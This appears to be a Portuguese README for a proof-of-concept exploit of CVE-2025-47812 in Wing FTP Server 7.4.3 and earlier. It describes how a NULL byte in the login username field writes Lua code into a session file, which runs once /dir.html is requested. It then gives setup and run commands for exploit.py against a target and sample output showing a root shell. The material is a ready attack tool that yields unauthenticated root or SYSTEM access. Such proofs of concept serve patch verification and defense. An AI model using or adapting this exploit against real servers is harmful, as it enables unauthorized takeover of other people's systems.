
Exploit de prova de conceito para CVE-2025-47812: execução remota de código não autenticada no Wing FTP Server <= 7.4.3 via injeção de byte nulo no parâmetro de nome de usuário, fornecendo acesso a shell root/SYSTEM.
Vulnerabilidade de execução remota de código não autenticada no Wing FTP Server <= 7.4.3. Um byte NULL injetado no parâmetro
usernamedurante o login faz com que código Lua seja escrito no arquivo de sessão. Quando/dir.htmlé acessado com o cookie de sessão resultante, o código injetado é executado — como root no Linux ou SYSTEM no Windows.
/loginok.html injeta um byte NULL seguido de código Lua no campo username./dir.html com o cookie UID retornado aciona a execução do código Lua injetado.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
Exemplo:
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root